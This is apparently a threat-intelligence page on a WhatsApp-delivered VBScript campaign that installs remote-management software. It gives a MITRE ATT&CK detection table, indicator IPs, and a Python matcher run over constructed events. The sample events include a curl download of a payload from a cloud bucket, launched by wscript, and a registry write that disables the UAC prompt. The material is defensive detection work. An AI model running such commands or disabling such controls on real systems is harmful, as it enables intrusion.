
WhatsApp VBScript RMM Campaign
Indicators of Compromise
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
Remediation / Detections
Source: attack.mitre.org
| Technique ID | Technique Name | Detection ID | Detection Name | Recommended Detection Action |
|---|---|---|---|---|
| T1566.003 | Phishing: Spearphishing via Service | DET0115 | Detection Strategy for Spearphishing via a Service | Monitor messaging platform API logs and endpoint telemetry for VBScript files delivered via WhatsApp Desktop or WhatsApp Web processes. |
| T1204.002 | User Execution: Malicious File | DET0294 | User Execution – Malicious File | Alert on WScript.exe or CScript.exe spawned by WhatsApp.Root.exe, explorer.exe, or browsers opening files from the Downloads directory. |
| T1059.005 | Command and Scripting Interpreter: Visual Basic | DET0076 | Behavioral Detection of Visual Basic Execution | Detect WScript.exe executing .vbs/.vbe files from C:\Users\Public\Documents\ or user temp directories; flag multi-stage download chains. |
| T1059.001 | Command and Scripting Interpreter: PowerShell | DET0455 | Abuse of PowerShell for Arbitrary Execution | Alert on PowerShell invoked by VBScript (WScript.exe → powershell.exe) performing file download operations. |
| T1105 | Ingress Tool Transfer | DET0060 | Detect Ingress Tool Transfers via Behavioral Chain | Monitor for curl.exe, bitsadmin.exe, or certutil.exe spawned by scripting engines downloading content from cloud storage buckets (S3, Alibaba OSS, Backblaze). |
| T1140 | Deobfuscate/Decode Files or Information | DET0275 | Detect Adversary Deobfuscation or Decoding | Detect certutil -decode or PowerShell Base64 decode operations performed by WScript child processes. |
| T1027 | Obfuscated Files or Information | DET0378 | Behavioral Detection of Obfuscated Files or Information | Flag VBScript files with excessive string concatenation, randomized variable names, or entropy anomalies indicative of heavy obfuscation. |
| T1036.008 | Masquerading: Masquerade File Type | DET0226 | Detection Strategy for Masquerading via File Type Modification | Alert on file rename operations that change extensions from .pdf or .txt to .vbs performed by scripting engine child processes. |
| T1197 | BITS Jobs | DET0098 | Detect abuse of Windows BITS Jobs | Monitor BitsTransfer or bitsadmin.exe download jobs created by WScript.exe; alert on BITS jobs targeting non-corporate cloud storage domains. |
| T1553.005 | Subvert Trust Controls: Mark-of-the-Web Bypass | DET0257 | Detect Mark-of-the-Web (MOTW) Bypass | Monitor for deletion of Zone.Identifier alternate data streams from files extracted by the Shell.Application CopyHere method. |
| T1548.002 | Abuse Elevation Control Mechanism: Bypass UAC | DET0388 | Detection Strategy for Bypass User Account Control (UAC) | Alert on repeated registry modification attempts targeting HKLM\...\Policies\System\ConsentPromptBehaviorAdmin via runas-elevated ShellExecute calls. |
| T1112 | Modify Registry | DET0280 | Behavior-Based Registry Modification Detection on Windows | Monitor registry writes to ConsentPromptBehaviorAdmin; alert on any change of the value to 0 (no prompt) by non-administrative processes. |
| T1564.001 | Hide Artifacts: Hidden Files and Directories | DET0032 | Detection Strategy for Hidden Files and Directories | Detect creation of directories under C:\Users\Public\Documents\ with hidden and system attributes set by scripting engine processes. |
| T1218.007 | System Binary Proxy Execution: Msiexec | DET0158 | Detection of Msiexec Abuse | Alert on msiexec.exe invoked silently (/qn) by WScript.exe or cmd.exe to install UEMSAgent.msi or other non-IT-approved MSI packages. |
| T1102 | Web Service | DET0425 | Suspicious Use of Web Services for C2 | Detect outbound HTTP/HTTPS connections from WScript child processes to S3, Alibaba OSS (aliyuncs.com), or Backblaze B2 endpoints. |
| T1219 | Remote Access Tools | DET0496 | Behavior-Chain Detection for Remote Access Tools | Monitor for ManageEngine Endpoint Central agent registration beaconing to the 202.61.160.0/24 subnet or 38.55.151.63 that was not initiated by IT. |
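As an added example (not part of this guidance or of MITRE's content), the following Python matcher applies several of the table's behaviour chains (DET0294, DET0076, DET0060, DET0275, DET0158, DET0280) to constructed Sysmon-style process-creation and registry events. The event field names, the amazonaws.com and backblazeb2.com domains, and the sample paths and hostnames are assumptions; only aliyuncs.com, the process names and the registry value come from the table.

```python
# Behaviour-chain matcher for the WhatsApp VBScript -> RMM campaign table.
# Field names (image, parent_image, cmdline, target, value) are an assumed
# Sysmon-like schema, not a real log format.
SCRIPT_ENGINES = {"wscript.exe", "cscript.exe"}
DELIVERY_PARENTS = {"whatsapp.root.exe", "explorer.exe", "chrome.exe", "msedge.exe"}
DOWNLOADERS = {"powershell.exe", "curl.exe", "bitsadmin.exe", "certutil.exe"}
CLOUD_DOMAINS = ("amazonaws.com", "aliyuncs.com", "backblazeb2.com")  # last two assumed
STAGING_DIR = "c:\\users\\public\\documents\\"
UAC_KEY_SUFFIX = "\\policies\\system\\consentpromptbehavioradmin"

def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]

def check_process(ev):
    """Return [(detection id, reason)] for one process-creation event."""
    name, parent = _base(ev["image"]), _base(ev["parent_image"])
    cmd = ev["cmdline"].lower()
    hits = []
    if name in SCRIPT_ENGINES and parent in DELIVERY_PARENTS and "\\downloads\\" in cmd:
        hits.append(("DET0294", f"{name} launched from Downloads by {parent}"))
    if name in SCRIPT_ENGINES and STAGING_DIR in cmd:
        hits.append(("DET0076", "script run from public staging directory"))
    if parent in SCRIPT_ENGINES and name in DOWNLOADERS and any(d in cmd for d in CLOUD_DOMAINS):
        hits.append(("DET0060", f"{name} fetching from cloud storage under {parent}"))
    if parent in SCRIPT_ENGINES and name == "certutil.exe" and "-decode" in cmd:
        hits.append(("DET0275", "certutil decode spawned by script engine"))
    if name == "msiexec.exe" and "/qn" in cmd and parent in SCRIPT_ENGINES | {"cmd.exe"}:
        hits.append(("DET0158", "silent MSI install spawned by script engine or cmd"))
    return hits

def check_registry(ev):
    """Flag ConsentPromptBehaviorAdmin being set to 0 (UAC prompt disabled)."""
    if ev["target"].lower().endswith(UAC_KEY_SUFFIX) and ev["value"].strip() == "0":
        return [("DET0280", f"UAC prompt disabled by {_base(ev['image'])}")]
    return []

# Constructed events: a WhatsApp-delivered .vbs, its curl child, a benign process,
# and a registry write disabling the UAC prompt.
SAMPLE_PROCESS_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe", "parent_image": r"C:\Program Files\WhatsApp\WhatsApp.Root.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\invoice.vbs"'},
    {"image": r"C:\Windows\System32\curl.exe", "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"curl.exe -o C:\Users\Public\Documents\s.bin https://bucket.oss-cn-hangzhou.aliyuncs.com/s.bin"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe notes.txt"},
]
SAMPLE_REGISTRY_EVENT = {"image": r"C:\Windows\System32\wscript.exe", "value": "0",
    "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin"}

def run_samples():
    """Evaluate the constructed events; returns DET0294, DET0060 and DET0280 hits."""
    hits = [h for ev in SAMPLE_PROCESS_EVENTS for h in check_process(ev)]
    return hits + check_registry(SAMPLE_REGISTRY_EVENT)
```

The chains are deliberately narrow (exact parent/child names and substrings); in production they would be expressed as SIEM or Sigma rules with the same parent-child and path conditions.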